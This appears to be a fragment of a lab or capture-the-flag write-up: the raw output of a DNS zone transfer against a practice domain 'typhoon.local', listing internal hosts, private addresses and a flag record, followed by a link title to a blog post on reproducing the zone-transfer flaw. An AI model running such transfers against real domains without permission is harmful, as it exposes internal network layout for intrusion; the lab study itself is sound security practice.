  typhoon.local.          3600    IN      SOA     ns.prismacsi.com. enes.prismacsi.com. 1 3600 600 86400 3600
  typhoon.local.          3600    IN      NS      ns1.typhoon.local.
  typhoon.local.          3600    IN      NS      ns2.typhoon.local.
  calendar.typhoon.local. 3600    IN      CNAME   wwww.typhoon.local.
  flag.typhoon.local.     3600    IN      TXT     "g00d_j0b_typh00n!"
  ns1.typhoon.local.      3600    IN      A       192.168.1.5
  ns2.typhoon.local.      3600    IN      A       192.168.1.6
  prisma.typhoon.local.   3600    IN      A       192.168.1.8
  secretmessage.typhoon.local. 3600 IN    TXT     "prismacsi.com"
  www.typhoon.local.      3600    IN      A       192.168.1.7
  typhoon.local.          3600    IN      SOA     ns.prismacsi.com. enes.prismacsi.com. 1 3600 600 86400 3600
  ;; Query time: 0 msec
  ;; SERVER: 192.168.56.122#53(192.168.56.122) (TCP)
  ;; WHEN: Sun Jul 02 22:36:41 EDT 2023
  ;; XFR size: 11 records (messages 1, bytes 338)

• (1条消息) P5 利用Vulhub复现漏洞 -DNS域传送漏洞_53:dns服务端口(tcp/udp 53)漏洞修复_在下小黄的博客-CSDN博客